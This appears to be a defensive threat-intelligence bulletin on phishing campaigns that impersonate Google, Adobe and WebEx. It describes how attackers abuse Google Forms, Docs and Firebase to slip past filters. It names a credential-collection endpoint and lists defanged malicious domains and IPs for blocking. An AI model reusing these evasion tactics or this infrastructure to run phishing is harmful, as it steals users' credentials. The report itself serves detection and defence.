Need to Report an Incident? Call +1 (877) 707-7997

Guidance on the SolarWinds Orion Compromise       

Latest Phishing Campaigns Target Google, Adobe and WebEx

Golang Worm
Share on linkedin
Share on facebook
Share on twitter
Share on reddit
Share on email
Share on print

Overview: Latest Phishing Campaigns Impersonating Common Applications

This report is an overview of recent phishing campaigns targeting Google, Adobe and WebEx. Phishing is one of the most common initial attack vectors for malware, including ransomware like Ryuk.

Tactics, Techniques, and Procedures

Research by Armorblox reveals a pattern wherein bad actors utilize services like Google Forms, Google Docs and Firebase to host phishing content. A common practice for phishing attacks, these emails impersonate legitimate companies and authorities to pressure users into action. One of the emails analyzed directed users to a Google Form impersonating the well-known Microsoft sign-in page. The links generated through these legitimate Google services will allow phishing emails to evade security controls.

Related Webinar-on-Demand: How to Implement a “Risk-based Strategy for ‘Killer’ Threat Hunting Programs”

This is an example of a benefactor scam email with a Google form link:

Source: Armorblox

Separately, anti-phishing solution provider Cofense uncovered an increase in phishing campaigns impersonating Adobe Document Cloud and Cisco WebEx. WebEx is a common service impersonated in phishing campaigns.

In the attack observed by Cofense, the domains, “hxxp://eliteddi[.]com” and “hxxp://idbrokerwebex[.]com” were used to host convincing content impersonating a WebEx meeting invitation.

The Adobe attacks come with an attached HTML document housing a spoofed Adobe Document Cloud login form, which sends data to “infiniteworks[.]net/IDI/high.php.” Upon further investigation of the domain, we uncovered additional phishing URLs impersonating Adobe, Lloyds Banking Group and Google within the IDI directory. The website is hosted through BlueHost, running a WordPress installation with the default “Twenty Seventeen” theme.

Source: Cofense

Business Unit Impact

  • May lead to compromised user accounts and unauthorized access to data and systems
  • May provide malicious actors a foothold within your network to be used for lateral movement

Recommendations

  • Provide users with training on best practices to avoid phishing, as well as awareness of recent trends in phishing campaigns
  • Implement MFA for users and services
  • Block provided IOCs

Indicators of Compromise (IOC)

  • infiniteworks[.]net
  • eliteddi[.]com
  • idbrokerwebex[.]com
  • 70[.]40[.]220[.]123
  • 192[.]185[.]214[.]103
  • 216[.]172[.]161[.]34

Sources

  • https://www.armorblox.com/blog/ok-google-build-me-a-phishing-campaign/
  • https://cofense.com/online-leader-invites-you-to-this-webex-phish/
  • https://cofense.com/document-sharing-services-represent-a-vector-for-phishing-campaigns/

Supporting Documentation:

  • MITRE Mapping(s)
    • Initial Access: https://attack.mitre.org/tactics/TA0001/
      • Phishing: https://attack.mitre.org/techniques/T1566/

Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report will outline a “top-of-mind” threat and how it ought to be addressed accordingly.

This informed analysis is based on the latest data available.

Share this:
Share on linkedin
Share on twitter
Share on facebook
Share on reddit
Share on email
Share on print

Sign-up for Weekly Updates